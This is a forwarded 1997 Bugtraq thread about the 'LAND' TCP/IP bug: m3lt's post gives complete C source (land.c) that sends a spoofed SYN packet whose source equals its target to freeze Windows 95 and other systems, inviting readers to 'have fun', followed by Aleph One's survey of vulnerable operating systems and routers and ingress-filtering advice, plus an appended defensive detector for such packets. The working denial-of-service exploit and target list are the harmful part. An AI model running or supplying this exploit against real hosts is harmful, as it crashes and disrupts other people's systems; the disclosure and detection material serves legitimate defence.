
[m3lt <meltman@LAGGED.NET>] new TCP/IP bug in win95



--- Begin Message ---
I tested this on a falcon running mint 1.14 pl3, mintnet 1.0 pl1 and
rlogin as the only service available. It seems to lock the machine
quite well, but ctrl-alt-del still works. As other systems have
behaved in strange ways, I'll need to test some more.

---clip---clip---
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.971120193920.5942A-100000@lagged.net>
Date: 	Thu, 20 Nov 1997 19:40:19 -0500
Reply-To: m3lt <meltman@LAGGED.NET>
From: m3lt <meltman@LAGGED.NET>
Subject:      new TCP/IP bug in win95
To: BUGTRAQ@NETSPACE.ORG

hi,

        i recently discovered a bug which freezes win95 boxes.  here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139).  this will cause the win95 machine to lock
up.

        the piece of code included in this message does that, so...  have fun!

        i haven't tested this bug on other platforms, i don't have the
resources.  please feel free to do so.

m3lt
meltman@lagged.net

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <stdlib.h>             /* atoi */
#include <strings.h>            /* bzero, bcopy */
#include <unistd.h>             /* close */
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
/* the two headers below are the Linux libc5-era names the original was
   written against; they supply IP_TCP and the BSD-style tcphdr fields */
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

/* one's complement checksum over length bytes (RFC 1071);
   the accumulator must start at zero, which the original left uninitialised */
u_short checksum(u_short * data,u_short length)
{
        register long value=0;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        /* fold the end-around carry until none remains */
        while(value>>16)
                value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        /* IP header: source and destination are both the target */
        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        /* TCP SYN with source port equal to destination port */
        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        /* pseudo-header (addresses, protocol, length) plus the TCP header,
           over which the TCP checksum is computed */
        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}

--- snip snip -----------------------------------------------------------

From: Aleph One <aleph1@dfw.net>
Subject:      Re: "LAND" Attack Update
To: BUGTRAQ@NETSPACE.ORG
Date: 	Fri, 21 Nov 1997 13:22:22 -0600
Reply-To: Aleph One <aleph1@dfw.net>
Approved-By: aleph1@UNDERGROUND.ORG
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.SUN.3.94.971121131518.2700D-100000@dfw.dfw.net>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
X-cc:         mtibodea@cisco.com
In-Reply-To:  <Pine.SUN.3.94.971121011301.9521D-100000@dfw.dfw.net>

The latest update. It seems that not many versions of IOS are affected.
The symptoms can also be strange. It will stop accepting connections, then
after 30 seconds it may stop processing ICMP echoes, and after
that it stops forwarding packets. So if you perform the test, wait a couple
of minutes and see if it is still up before you come to any conclusions. Ivan
Ganev also reports that testing against port 23 alone would not kill the
router but testing against the first 255 ports did.

From the reports it seems to be the older revisions of IOS (10.X and 11.0)
in certain hardware configurations and the Cisco 700 Series ISDN access
routers (not running IOS) that are vulnerable.

We keep getting conflicting reports for FreeBSD and OpenBSD. There are
enough reports and indications that those operating systems are indeed
vulnerable, but the vulnerability may not show up in all configurations
depending on the environment, the intensity of cosmic rays, the phase of
the moon, and whether the testing person is left or right handed.

An external "land" attack should not be an issue if you are filtering IP
address spoofing at your ingress routers. You _ARE_ doing so? Correct?
Well in case you forgot you can find Paul Ferguson's "Network Ingress
Filtering: Defeating Denial of Service Address Spoofing" Internet Draft at
ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt
I highly recommend you implement its recommendations. Of course you are
still at the mercy of those behind the filter.

The survey says:

AIX 3                                   IS  vulnerable
AIX 3.2                                 NOT vulnerable
AIX 4                                   NOT vulnerable
AIX 4.1                                 NOT vulnerable
BeOS Preview Release 2 PowerMac         IS  vulnerable
BSDI 2.1 (vanilla)                      IS  vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024)   NOT vulnerable
BSDI 3.0                                NOT vulnerable
DG/UX R4.12                             NOT vulnerable
Digital UNIX 4.0                        NOT vulnerable
FreeBSD 2.2.2-RELEASE                   (conflicting reports)
FreeBSD 2.2.5-RELEASE                   (conflicting reports)
FreeBSD 2.2.5-STABLE                    (conflicting reports)
FreeBSD 3.0-CURRENT                     IS  vulnerable
HP External JetDirect Print Servers     IS  vulnerable
HP-UX 10.20                             IS  vulnerable
IRIX 5.3                                IS  vulnerable
IRIX 6.2                                NOT vulnerable
IRIX 6.3                                NOT vulnerable
IRIX 6.4                                NOT vulnerable
Linux 2.0.30                            NOT vulnerable
Linux 2.0.32                            NOT vulnerable
MacOS 7.5.1                             NOT vulnerable
MacOS 8.0                               IS  vulnerable (TCP/IP stack crashed)
MVS OS390 1.3                           NOT vulnerable
AIX 4.1                                 NOT vulnerable
NetApp NFS server 4.3                   IS  vulnerable
NetBSD 1.1                              IS  vulnerable
NetBSD 1.2                              IS  vulnerable
NetBSD 1.2a                             IS  vulnerable
NetBSD 1.2.1                            IS  vulnerable
NetBSD 1.3_ALPHA                        IS  vulnerable
NeXTSTEP 3.0                            IS  vulnerable
NeXTSTEP 3.1                            IS  vulnerable
Novell 4.11                             NOT vulnerable
OpenBSD 2.1                             (conflicting reports)
OS/2 3.0                                NOT vulnerable
QNX 4.24                                IS  vulnerable
OpenBSD 2.2 (Oct31)                     NOT vulnerable
SCO OpenServer 5.0.4                    NOT vulnerable
Solaris 2.4                             NOT vulnerable
Solaris 2.5.1                           NOT vulnerable
Solaris 2.6                             NOT vulnerable
SunOS 4.1.4                             IS  vulnerable
Ultrix ???                              NOT vulnerable
Windows 95 (vanilla)                    IS  vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE     IS  vulnerable
Windows NT (vanilla)                    IS  vulnerable
Windows NT + SP3                        IS  vulnerable
Windows NT + SP3 + simptcp-fix          IS  vulnerable

Some misc stuff:

3Com SuperStack II                      IS  vulnerable
Apple LaserWriter                       IS  vulnerable
Ascend 4000 5.0Ap20                     NOT vulnerable
Ascend Pipeline 50 rev 5.0Ai16          NOT vulnerable
Ascend Pipeline 50 rev 5.0Ap13          NOT vulnerable
BayNetworks MARLIN 1000 OS (0).3.024(R) NOT vulnerable
BinTec BIANCA/BRICK-XS 4.6.1 router     IS  vulnerable
Cisco IOS 10.3(7)                       IS  vulnerable
Cisco IOS 11.1(13)                      NOT vulnerable
Cisco 1003 IOS 11.0                     NOT vulnerable
Cisco 1005 IOS 11.0(4)                  NOT vulnerable
Cisco 1600 IOS 11.0(6) fc1              IS  vulnerable
Cisco 1601 IOS 11.1(8) AA               NOT vulnerable
Cisco 1601 IOS 11.1(10)AA               NOT vulnerable
Cisco 2500 IOS 11.0(9)                  NOT vulnerable
Cisco 2500 IOS 11.1(6) fc1              IS  vulnerable
Cisco 2500 IOS 11.1(10)                 NOT vulnerable
Cisco 2501 IOS 10.2                     IS  vulnerable
Cisco 2501 IOS 10.2(2)                  IS  vulnerable
Cisco 2501 IOS 10.(7)                   IS  vulnerable
Cisco 2501 IOS 11.1(9)                  NOT vulnerable
Cisco 2501 IOS 11.2(4)P                 NOT vulnerable
Cisco 2503 IOS 11.0(9)                  IS  vulnerable
Cisco 2509 IOS 11.1                     NOT vulnerable
Cisco 2511 IOS ???                      IS  vulnerable
Cisco 2511 IOS 10.3(4)                  NOT vulnerable
Cisco 2511 IOS 11.1(8)                  NOT vulnerable
Cisco 2511 IOS 11.2(4)                  NOT vulnerable
Cisco 2514 IOS 11.2(5)                  NOT vulnerable
Cisco 3102 IOS 9.X                      IS  vulnerable
Cisco 4000 IOS 11.0(7)                  NOT vulnerable
Cisco 4000 IOS 11.1(6)                  NOT vulnerable
Cisco 4000 IOS 11.2(4) fc1              NOT vulnerable
Cisco 4000 IOS 11.2(9)                  NOT vulnerable
Cisco 4500 IOS 10.13(15)                IS  vulnerable
Cisco 4500 IOS 11.2(9)                  NOT vulnerable
Cisco 4700M IOS 11.0(16)                NOT vulnerable
Cisco 7000 IOS 11.0(1)                  NOT vulnerable
Cisco 7000 IOS 11.0(16)                 NOT vulnerable
Cisco 7000 IOS 11.1(12)                 NOT vulnerable
Cisco 7000 IOS 11.2(8)                  NOT vulnerable
Cisco 7507 IOS 11.0(17)                 NOT vulnerable
Cisco 753 OS Release 4                  IS  vulnerable
Cisco 753 OS Release 4.0                IS  vulnerable
Cisco 754 OS Release 4.1                IS  vulnerable
Cisco 761 OS Release 4.0(1)             IS  vulnerable
Cisco Catalyst 5000                     IS  vulnerable
Digital VT1200                          IS  vulnerable
HP Envizex Terminal                     IS  vulnerable
LaserJet Printer                        NOT vulnerable
Livingston Office Router (ISDN)         IS  vulnerable
Livingston PM ComOS 3.3.3               NOT vulnerable
Livingston PM ComOS 3.5b17 + 3.7.2      NOT vulnerable
Livingston PM ComOS 3.7L                NOT vulnerable
Livingston Enterprise PM 3.4 2L         NOT vulnerable
Milkyway Firewall 3.02 (SunOS)          IS  vulnerable
NCD X Terminals, NCDWare v3.1.0         IS  vulnerable
NCD X Terminals, NCDWare v3.2.1         IS  vulnerable



--- End Message ---
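An added example, not code from either post above, written from the defender's side for the packet m3lt describes and the survey Aleph One collected: a detector for "land" packets, i.e. IPv4/TCP segments whose source address and port equal the destination address and port and whose SYN flag is set. It parses raw bytes (so it needs none of the libc5 headers land.c relies on), verifies the IP header checksum with a correctly initialised and fully folded RFC 1071 routine, and classifies sample packets it constructs in memory. The addresses and ports in the samples (10.0.0.1:139 from the post, 10.0.0.2:40000 as an ordinary client) are constructed; nothing is sent.

```c
/* Added example, not from either Bugtraq post: a detector for "land"
 * packets (IPv4/TCP, source == destination address and port, SYN set).
 * It parses raw bytes and needs none of the 1997 libc5 headers land.c
 * uses.  Sample packets are constructed in memory; nothing is sent. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IP_HDR_LEN   20
#define TCP_HDR_LEN  20
#define TCP_FLAG_SYN 0x02

/* RFC 1071 Internet checksum.  Byte-wise, so independent of host byte
 * order; accumulator initialised, carry folded until none remains. */
uint16_t inet_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)data[i] << 8) | data[i + 1];
    if (len & 1)
        sum += (uint32_t)data[len - 1] << 8;     /* odd trailing byte */
    while (sum >> 16)
        sum = (sum & 0xFFFFu) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Builds a minimal IPv4+TCP SYN (no options, no payload) into out, which
 * must hold 40 bytes; returns the length.  Constructs sample input for
 * the detector only.  TCP checksum left zero: the detector ignores it. */
size_t build_syn_packet(uint8_t *out, const uint8_t src[4], uint16_t sport,
                        const uint8_t dst[4], uint16_t dport)
{
    uint8_t *ip = out, *tcp = out + IP_HDR_LEN;
    uint16_t csum;
    memset(out, 0, IP_HDR_LEN + TCP_HDR_LEN);
    ip[0] = 0x45;                          /* version 4, IHL 5 words */
    ip[3] = IP_HDR_LEN + TCP_HDR_LEN;      /* total length, high byte 0 */
    ip[8] = 64;                            /* TTL */
    ip[9] = 6;                             /* protocol: TCP */
    memcpy(ip + 12, src, 4);
    memcpy(ip + 16, dst, 4);
    csum = inet_checksum(ip, IP_HDR_LEN);  /* header with csum field 0 */
    ip[10] = csum >> 8; ip[11] = csum & 0xFF;
    tcp[0] = sport >> 8; tcp[1] = sport & 0xFF;
    tcp[2] = dport >> 8; tcp[3] = dport & 0xFF;
    tcp[12] = (TCP_HDR_LEN / 4) << 4;      /* data offset 5 words */
    tcp[13] = TCP_FLAG_SYN;
    tcp[14] = 0x08;                        /* window 2048 */
    return IP_HDR_LEN + TCP_HDR_LEN;
}

/* Classifies a raw IPv4 packet: 1 = land packet, 0 = anything else,
 * -1 = too short, not IPv4, not TCP, or bad IP header checksum (a
 * corrupted header should not be matched). */
int is_land_packet(const uint8_t *pkt, size_t len)
{
    size_t ihl;
    const uint8_t *tcp;
    uint16_t sport, dport;
    if (len < IP_HDR_LEN || (pkt[0] >> 4) != 4)
        return -1;
    ihl = (pkt[0] & 0x0F) * 4;
    if (ihl < IP_HDR_LEN || len < ihl + TCP_HDR_LEN || pkt[9] != 6)
        return -1;
    if (inet_checksum(pkt, ihl) != 0)          /* header checksum fails */
        return -1;
    tcp = pkt + ihl;
    sport = (uint16_t)((tcp[0] << 8) | tcp[1]);
    dport = (uint16_t)((tcp[2] << 8) | tcp[3]);
    if (memcmp(pkt + 12, pkt + 16, 4) == 0 && sport == dport &&
        (tcp[13] & TCP_FLAG_SYN))
        return 1;
    return 0;
}

/* Constructed samples: 1 = 10.0.0.1:139 -> 10.0.0.1:139 (the case in the
 * post), 0 = ordinary SYN from 10.0.0.2:40000 to 10.0.0.1:139, 2 = the
 * land packet truncated after its IP header, 3 = the land packet with a
 * corrupted TTL so the header checksum no longer verifies. */
int classify_sample(int which)
{
    static const uint8_t victim[4] = {10, 0, 0, 1}, client[4] = {10, 0, 0, 2};
    uint8_t pkt[IP_HDR_LEN + TCP_HDR_LEN];
    size_t len = (which == 0)
        ? build_syn_packet(pkt, client, 40000, victim, 139)
        : build_syn_packet(pkt, victim, 139, victim, 139);
    if (which == 2) len = IP_HDR_LEN;
    if (which == 3) pkt[8] = 1;
    return is_land_packet(pkt, len);
}

int main(void)
{
    printf("land=%d ordinary=%d truncated=%d corrupted=%d\n", classify_sample(1),
           classify_sample(0), classify_sample(2), classify_sample(3));
    return 0;
}
```

The same test, applied at a border router to packets arriving from outside whose source address belongs to the inside, is what the Ferguson ingress-filtering draft referenced above asks for; the LAND packet is just the degenerate case where the spoofed source is the destination itself.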